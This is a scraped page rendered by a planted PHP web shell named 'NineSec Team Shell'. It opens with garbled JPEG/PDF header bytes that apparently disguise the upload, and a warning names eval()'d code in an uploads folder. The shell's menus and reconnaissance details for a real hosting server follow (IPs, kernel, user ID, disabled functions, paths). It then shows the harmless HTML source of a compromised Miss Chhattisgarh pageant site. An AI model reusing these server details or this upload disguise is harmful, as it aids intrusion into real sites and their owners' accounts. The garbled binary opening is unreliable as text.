JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/misschhattisgarh.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/misschhattisgarh.com/public_html/home.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Miss Chhattisgarh - Official Website</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Poppins', sans-serif;
        }
        
        :root {
            --primary: #d41b4a;
            --secondary: #f8e504;
            --dark: #1f2937;
            --light: #f9fafb;
        }
        
        body {
            background-color: var(--light);
            color: var(--dark);
            line-height: 1.6;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
        }
        
        /* Header Styles */
        header {
            background: linear-gradient(to right, #d41b4a, #a3163a);
            color: white;
            padding: 15px 0;
            position: sticky;
            top: 0;
            z-index: 100;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
        }
        
        .header-content {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .logo {
            display: flex;
            align-items: center;
        }
        
        .logo h1 {
            font-size: 28px;
            font-weight: 700;
            margin-left: 10px;
        }
        
        .logo-img {
            width: 50px;
            height: 50px;
            background: var(--secondary);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-weight: bold;
            color: var(--primary);
        }
        
        nav ul {
            display: flex;
            list-style: none;
        }
        
        nav ul li {
            margin-left: 25px;
        }
        
        nav ul li a {
            color: white;
            text-decoration: none;
            font-weight: 500;
            transition: all 0.3s ease;
        }
        
        nav ul li a:hover {
            color: var(--secondary);
        }
        
        .auth-buttons {
            display: flex;
            gap: 15px;
        }
        
        .auth-btn {
            padding: 8px 20px;
            border-radius: 30px;
            text-decoration: none;
            font-weight: 600;
            transition: all 0.3s ease;
        }
        
        .login-btn {
            background: transparent;
            border: 2px solid white;
            color: white;
        }
        
        .login-btn:hover {
            background: white;
            color: var(--primary);
        }
        
        .register-btn {
            background: var(--secondary);
            color: var(--dark);
            border: 2px solid var(--secondary);
        }
        
        .register-btn:hover {
            background: transparent;
            color: var(--secondary);
        }
        
        .mobile-menu {
            display: none;
            font-size: 24px;
        }
        
        /* Hero Section */
        .hero {
            background: linear-gradient(rgba(0, 0, 0, 0.6), rgba(0, 0, 0, 0.6)), url('https://images.unsplash.com/photo-1530577197743-7adf14294574?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=1200&q=80');
            background-size: cover;
            background-position: center;
            height: 80vh;
            display: flex;
            align-items: center;
            justify-content: center;
            text-align: center;
            color: white;
            padding: 20px;
        }
        
        .hero-content h2 {
            font-size: 3.5rem;
            margin-bottom: 20px;
            text-shadow: 2px 2px 5px rgba(0, 0, 0, 0.5);
        }
        
        .hero-content p {
            font-size: 1.2rem;
            max-width: 700px;
            margin: 0 auto 30px;
        }
        
        .btn {
            display: inline-block;
            background: var(--primary);
            color: white;
            padding: 12px 30px;
            border-radius: 30px;
            text-decoration: none;
            font-weight: 600;
            transition: all 0.3s ease;
        }
        
        .btn:hover {
            background: var(--secondary);
            color: var(--dark);
            transform: translateY(-3px);
            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
        }
        
        /* Section Styles */
        .section {
            padding: 80px 0;
        }
        
        .section-title {
            text-align: center;
            margin-bottom: 50px;
        }
        
        .section-title h2 {
            font-size: 2.5rem;
            color: var(--primary);
            position: relative;
            display: inline-block;
            padding-bottom: 15px;
        }
        
        .section-title h2::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 80px;
            height: 3px;
            background: var(--secondary);
        }
        
        /* Models Section */
        .models-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
            gap: 30px;
        }
        
        .model-card {
            background: white;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
            transition: transform 0.3s ease;
        }
        
        .model-card:hover {
            transform: translateY(-10px);
        }
        
        .model-img {
            height: 300px;
            overflow: hidden;
        }
        
        .model-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            transition: transform 0.5s ease;
        }
        
        .model-card:hover .model-img img {
            transform: scale(1.1);
        }
        
        .model-info {
            padding: 20px;
            text-align: center;
        }
        
        .model-info h3 {
            color: var(--primary);
            margin-bottom: 10px;
        }
        
        .model-info p {
            color: #666;
            margin-bottom: 15px;
        }
        
        /* Auditions Section */
        .auditions {
            background: #f5f5f5;
        }
        
        .audition-card {
            background: white;
            border-radius: 10px;
            padding: 30px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
            margin-bottom: 30px;
            display: flex;
            gap: 30px;
        }
        
        .audition-date {
            background: var(--primary);
            color: white;
            width: 100px;
            height: 100px;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            flex-shrink: 0;
        }
        
        .audition-date .day {
            font-size: 2rem;
            font-weight: 700;
        }
        
        .audition-content {
            flex-grow: 1;
        }
        
        .audition-content h3 {
            color: var(--primary);
            margin-bottom: 10px;
        }
        
        /* Events Section */
        .events-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 30px;
        }
        
        .event-card {
            background: white;
            border-radius: 10px;
            overflow: hidden;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
        }
        
        .event-img {
            height: 200px;
            overflow: hidden;
        }
        
        .event-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }
        
        .event-content {
            padding: 20px;
        }
        
        .event-content h3 {
            color: var(--primary);
            margin-bottom: 10px;
        }
        
        .event-meta {
            display: flex;
            justify-content: space-between;
            color: #666;
            font-size: 0.9rem;
            margin-bottom: 15px;
        }
        
        /* Associates Section */
        .associates {
            background: #f5f5f5;
        }
        
        .associates-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 30px;
            align-items: center;
        }
        
        .associate-item {
            background: white;
            border-radius: 10px;
            padding: 20px;
            text-align: center;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
            transition: transform 0.3s ease;
        }
        
        .associate-item:hover {
            transform: translateY(-5px);
        }
        
        .associate-logo {
            height: 80px;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 15px;
        }
        
        .associate-logo img {
            max-width: 100%;
            max-height: 100%;
        }
        
        /* Footer */
        footer {
            background: var(--dark);
            color: white;
            padding: 40px 0 20px;
        }
        
        .footer-content {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 30px;
            margin-bottom: 30px;
        }
        
        .footer-logo h2 {
            color: var(--secondary);
            margin-bottom: 15px;
        }
        
        .social-icons {
            display: flex;
            gap: 15px;
            margin-top: 20px;
        }
        
        .social-icons a {
            display: flex;
            align-items: center;
            justify-content: center;
            width: 40px;
            height: 40px;
            background: rgba(255, 255, 255, 0.1);
            border-radius: 50%;
            color: white;
            transition: all 0.3s ease;
        }
        
        .social-icons a:hover {
            background: var(--primary);
            transform: translateY(-3px);
        }
        
        .footer-links h3 {
            color: var(--secondary);
            margin-bottom: 20px;
            position: relative;
            padding-bottom: 10px;
        }
        
        .footer-links h3::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 0;
            width: 40px;
            height: 2px;
            background: var(--primary);
        }
        
        .footer-links ul {
            list-style: none;
        }
        
        .footer-links ul li {
            margin-bottom: 10px;
        }
        
        .footer-links ul li a {
            color: #ddd;
            text-decoration: none;
            transition: all 0.3s ease;
        }
        
        .footer-links ul li a:hover {
            color: var(--secondary);
            padding-left: 5px;
        }
        
        .copyright {
            text-align: center;
            padding-top: 20px;
            border-top: 1px solid rgba(255, 255, 255, 0.1);
        }
        
        /* Modal Styles */
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            z-index: 1000;
            align-items: center;
            justify-content: center;
        }
        
        .modal-content {
            background: white;
            border-radius: 10px;
            width: 90%;
            max-width: 500px;
            padding: 30px;
            position: relative;
        }
        
        .close-modal {
            position: absolute;
            top: 15px;
            right: 15px;
            font-size: 1.5rem;
            cursor: pointer;
            color: #999;
        }
        
        .close-modal:hover {
            color: var(--primary);
        }
        
        .form-group {
            margin-bottom: 20px;
        }
        
        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: 500;
        }
        
        .form-group input {
            width: 100%;
            padding: 12px 15px;
            border: 1px solid #ddd;
            border-radius: 5px;
            font-size: 16px;
        }
        
        .form-submit {
            text-align: center;
            margin-top: 20px;
        }
        
        /* Responsive Styles */
        @media (max-width: 992px) {
            .audition-card {
                flex-direction: column;
                text-align: center;
            }
            
            .audition-date {
                align-self: center;
            }
        }
        
        @media (max-width: 768px) {
            .header-content {
                flex-direction: column;
                text-align: center;
            }
            
            .logo {
                margin-bottom: 15px;
            }
            
            nav ul {
                margin-top: 15px;
                flex-wrap: wrap;
                justify-content: center;
            }
            
            nav ul li {
                margin: 0 10px 10px;
            }
            
            .auth-buttons {
                margin-top: 15px;
            }
            
            .mobile-menu {
                display: block;
                position: absolute;
                top: 20px;
                right: 20px;
                cursor: pointer;
            }
            
            .nav-menu {
                display: none;
            }
            
            .nav-menu.active {
                display: flex;
                flex-direction: column;
            }
            
            .hero-content h2 {
                font-size: 2.5rem;
            }
        }
    </style>
</head>
<body>
    <!-- Header Section -->
    <header>
        <div class="container">
            <div class="header-content">
                <div class="logo">
                    <div class="logo-img">MC</div>
                    <h1>Miss Chhattisgarh</h1>
                </div>
                <div class="mobile-menu">
                    <i class="fas fa-bars"></i>
                </div>
                <nav>
                    <ul class="nav-menu">
                        <li><a href="#">Home</a></li>
                        <li><a href="#">Contestants</a></li>
                        <li><a href="#">Events</a></li>
                        <li><a href="#">Gallery</a></li>
                        <li><a href="#">Sponsors</a></li>
                        <li><a href="#">Contact</a></li>
                    </ul>
                </nav>
                <div class="auth-buttons">
                    <a href="#" class="auth-btn login-btn" id="loginBtn">Login</a>
                    <a href="#" class="auth-btn register-btn" id="registerBtn">Register</a>
                </div>
            </div>
        </div>
    </header>

    <!-- Hero Section -->
    <section class="hero">
        <div class="hero-content">
            <h2>Welcome to Miss Chhattisgarh</h2>
            <p>Celebrating beauty, talent, and the spirit of Chhattisgarh. Join the most prestigious beauty pageant in the region and showcase your potential to the world.</p>
            <a href="#" class="btn" id="heroRegisterBtn">Register Now</a>
        </div>
    </section>

    <!-- Registered Models Section -->
    <section class="section">
        <div class="container">
            <div class="section-title">
                <h2>Our Contestants</h2>
                <p>Meet the talented participants of Miss Chhattisgarh 2023</p>
            </div>
            <div class="models-grid">
                <div class="model-card">
                    <div class="model-img">
                        <img src="https://images.unsplash.com/photo-1534528741775-53994a69daeb?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Contestant">
                    </div>
                    <div class="model-info">
                        <h3>Priya Sharma</h3>
                        <p>Raipur</p>
                        <a href="#" class="btn">View Profile</a>
                    </div>
                </div>
                <div class="model-card">
                    <div class="model-img">
                        <img src="https://images.unsplash.com/photo-1544005313-94ddf0286df2?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Contestant">
                    </div>
                    <div class="model-info">
                        <h3>Anjali Patel</h3>
                        <p>Bilaspur</p>
                        <a href="#" class="btn">View Profile</a>
                    </div>
                </div>
                <div class="model-card">
                    <div class="model-img">
                        <img src="https://images.unsplash.com/photo-1554151228-14d9def656e4?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Contestant">
                    </div>
                    <div class="model-info">
                        <h3>Sanjana Verma</h3>
                        <p>Durg</p>
                        <a href="#" class="btn">View Profile</a>
                    </div>
                </div>
            </div>
            <div style="text-align: center; margin-top: 40px;">
                <a href="#" class="btn">View All Contestants</a>
            </div>
        </div>
    </section>

    <!-- New Auditions Section -->
    <section class="section auditions">
        <div class="container">
            <div class="section-title">
                <h2>New Auditions</h2>
                <p>Join the next Miss Chhattisgarh competition</p>
            </div>
            <div class="audition-card">
                <div class="audition-date">
                    <div class="day">15</div>
                    <div class="month">OCT</div>
                </div>
                <div class="audition-content">
                    <h3>Raipur Auditions</h3>
                    <p>We're looking for talented and confident women from Raipur to participate in the Miss Chhattisgarh 2023 pageant. Don't miss this opportunity to showcase your talent and represent your city.</p>
                    <p><strong>Venue:</strong> City Mall, Raipur</p>
                    <p><strong>Time:</strong> 10:00 AM onwards</p>
                    <a href="#" class="btn">Apply Now</a>
                </div>
            </div>
            <div class="audition-card">
                <div class="audition-date">
                    <div class="day">22</div>
                    <div class="month">OCT</div>
                </div>
                <div class="audition-content">
                    <h3>Bilaspur Auditions</h3>
                    <p>We're looking for talented and confident women from Bilaspur to participate in the Miss Chhattisgarh 2023 pageant. Don't miss this opportunity to showcase your talent and represent your city.</p>
                    <p><strong>Venue:</strong> Town Hall, Bilaspur</p>
                    <p><strong>Time:</strong> 10:00 AM onwards</p>
                    <a href="#" class="btn">Apply Now</a>
                </div>
            </div>
        </div>
    </section>

    <!-- Recent Events Section -->
    <section class="section">
        <div class="container">
            <div class="section-title">
                <h2>Recent Events</h2>
                <p>Stay updated with our latest events and activities</p>
            </div>
            <div class="events-grid">
                <div class="event-card">
                    <div class="event-img">
                        <img src="https://images.unsplash.com/photo-1492684223066-81342ee5ff30?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Event">
                    </div>
                    <div class="event-content">
                        <h3>Photoshoot Workshop</h3>
                        <div class="event-meta">
                            <span><i class="far fa-calendar"></i> 10 Sept 2023</span>
                            <span><i class="far fa-clock"></i> 2:00 PM</span>
                        </div>
                        <p>Professional photoshoot training for all contestants with renowned photographers.</p>
                        <a href="#">Read More</a>
                    </div>
                </div>
                <div class="event-card">
                    <div class="event-img">
                        <img src="https://images.unsplash.com/photo-1511795409834-ef04bbd61622?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Event">
                    </div>
                    <div class="event-content">
                        <h3>Charity Gala</h3>
                        <div class="event-meta">
                            <span><i class="far fa-calendar"></i> 25 Sept 2023</span>
                            <span><i class="far fa-clock"></i> 7:00 PM</span>
                        </div>
                        <p>Annual charity gala event with our contestants to support women's education.</p>
                        <a href="#">Read More</a>
                    </div>
                </div>
                <div class="event-card">
                    <div class="event-img">
                        <img src="https://images.unsplash.com/photo-1511578314322-379afb476865?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=800&q=80" alt="Event">
                    </div>
                    <div class="event-content">
                        <h3>Fashion Show</h3>
                        <div class="event-meta">
                            <span><i class="far fa-calendar"></i> 5 Oct 2023</span>
                            <span><i class="far fa-clock"></i> 6:00 PM</span>
                        </div>
                        <p>Grand fashion show featuring our contestants and renowned designers.</p>
                        <a href="#">Read More</a>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Associates Section -->
    <section class="section associates">
        <div class="container">
            <div class="section-title">
                <h2>Our Associates</h2>
                <p>Proudly associated with these renowned brands</p>
            </div>
            <div class="associates-grid">
                <div class="associate-item">
                    <div class="associate-logo">
                        <i class="fas fa-gem fa-3x" style="color: #d41b4a;"></i>
                    </div>
                    <h3>Diamond Jewelers</h3>
                </div>
                <div class="associate-item">
                    <div class="associate-logo">
                        <i class="fas fa-tshirt fa-3x" style="color: #d41b4a;"></i>
                    </div>
                    <h3>Fashion House</h3>
                </div>
                <div class="associate-item">
                    <div class="associate-logo">
                        <i class="fas fa-spa fa-3x" style="color: #d41b4a;"></i>
                    </div>
                    <h3>Beauty Spa</h3>
                </div>
                <div class="associate-item">
                    <div class="associate-logo">
                        <i class="fas fa-hotel fa-3x" style="color: #d41b4a;"></i>
                    </div>
                    <h3>Grand Hotel</h3>
                </div>
            </div>
        </div>
    </section>

    <!-- Footer -->
    <footer>
        <div class="container">
            <div class="footer-content">
                <div class="footer-logo">
                    <h2>Miss Chhattisgarh</h2>
                    <p>Celebrating beauty, talent, and the spirit of Chhattisgarh. Join us in this prestigious journey.</p>
                    <div class="social-icons">
                        <a href="#"><i class="fab fa-facebook-f"></i></a>
                        <a href="#"><i class="fab fa-instagram"></i></a>
                        <a href="#"><i class="fab fa-twitter"></i></a>
                        <a href="#"><i class="fab fa-youtube"></i></a>
                    </div>
                </div>
                <div class="footer-links">
                    <h3>Quick Links</h3>
                    <ul>
                        <li><a href="#">Home</a></li>
                        <li><a href="#">Contestants</a></li>
                        <li><a href="#">Events</a></li>
                        <li><a href="#">Gallery</a></li>
                        <li><a href="#">Contact</a></li>
                    </ul>
                </div>
                <div class="footer-links">
                    <h3>Important Links</h3>
                    <ul>
                        <li><a href="#">Terms & Conditions</a></li>
                        <li><a href="#">Privacy Policy</a></li>
                        <li><a href="#">Application Process</a></li>
                        <li><a href="#">Judging Criteria</a></li>
                        <li><a href="#">FAQs</a></li>
                    </ul>
                </div>
            </div>
            <div class="copyright">
                <p>&copy; 2023 Miss Chhattisgarh. All Rights Reserved.</p>
            </div>
        </div>
    </footer>

    <!-- Login Modal -->
    <div class="modal" id="loginModal">
        <div class="modal-content">
            <span class="close-modal" id="closeLogin">&times;</span>
            <h2 style="text-align: center; margin-bottom: 20px; color: var(--primary);">Login to Your Account</h2>
            <form>
                <div class="form-group">
                    <label for="loginEmail">Email Address</label>
                    <input type="email" id="loginEmail" placeholder="Enter your email">
                </div>
                <div class="form-group">
                    <label for="loginPassword">Password</label>
                    <input type="password" id="loginPassword" placeholder="Enter your password">
                </div>
                <div class="form-submit">
                    <button type="submit" class="btn">Login</button>
                </div>
                <p style="text-align: center; margin-top: 20px;">
                    Don't have an account? <a href="#" id="switchToRegister" style="color: var(--primary);">Register now</a>
                </p>
            </form>
        </div>
    </div>

    <!-- Register Modal -->
    <div class="modal" id="registerModal">
        <div class="modal-content">
            <span class="close-modal" id="closeRegister">&times;</span>
            <h2 style="text-align: center; margin-bottom: 20px; color: var(--primary);">Create an Account</h2>
            <form>
                <div class="form-group">
                    <label for="registerName">Full Name</label>
                    <input type="text" id="registerName" placeholder="Enter your full name">
                </div>
                <div class="form-group">
                    <label for="registerEmail">Email Address</label>
                    <input type="email" id="registerEmail" placeholder="Enter your email">
                </div>
                <div class="form-group">
                    <label for="registerPhone">Phone Number</label>
                    <input type="tel" id="registerPhone" placeholder="Enter your phone number">
                </div>
                <div class="form-group">
                    <label for="registerPassword">Password</label>
                    <input type="password" id="registerPassword" placeholder="Create a password">
                </div>
                <div class="form-group">
                    <label for="registerConfirm">Confirm Password</label>
                    <input type="password" id="registerConfirm" placeholder="Confirm your password">
                </div>
                <div class="form-submit">
                    <button type="submit" class="btn">Register</button>
                </div>
                <p style="text-align: center; margin-top: 20px;">
                    Already have an account? <a href="#" id="switchToLogin" style="color: var(--primary);">Login now</a>
                </p>
            </form>
        </div>
    </div>

    <script>
        // Mobile menu toggle
        const mobileMenu = document.querySelector('.mobile-menu');
        const navMenu = document.querySelector('.nav-menu');
        
        mobileMenu.addEventListener('click', function() {
            navMenu.classList.toggle('active');
        });
        
        // Modal functionality
        const loginBtn = document.getElementById('loginBtn');
        const registerBtn = document.getElementById('registerBtn');
        const heroRegisterBtn = document.getElementById('heroRegisterBtn');
        const loginModal = document.getElementById('loginModal');
        const registerModal = document.getElementById('registerModal');
        const closeLogin = document.getElementById('closeLogin');
        const closeRegister = document.getElementById('closeRegister');
        const switchToRegister = document.getElementById('switchToRegister');
        const switchToLogin = document.getElementById('switchToLogin');
        
        loginBtn.addEventListener('click', function(e) {
            e.preventDefault();
            loginModal.style.display = 'flex';
        });
        
        registerBtn.addEventListener('click', function(e) {
            e.preventDefault();
            registerModal.style.display = 'flex';
        });
        
        heroRegisterBtn.addEventListener('click', function(e) {
            e.preventDefault();
            registerModal.style.display = 'flex';
        });
        
        closeLogin.addEventListener('click', function() {
            loginModal.style.display = 'none';
        });
        
        closeRegister.addEventListener('click', function() {
            registerModal.style.display = 'none';
        });
        
        switchToRegister.addEventListener('click', function(e) {
            e.preventDefault();
            loginModal.style.display = 'none';
            registerModal.style.display = 'flex';
        });
        
        switchToLogin.addEventListener('click', function(e) {
            e.preventDefault();
            registerModal.style.display = 'none';
            loginModal.style.display = 'flex';
        });
        
        // Close modal when clicking outside
        window.addEventListener('click', function(e) {
            if (e.target === loginModal) {
                loginModal.style.display = 'none';
            }
            if (e.target === registerModal) {
                registerModal.style.display = 'none';
            }
        });
    </script>
</body>
</html>

NineSec Team - 2022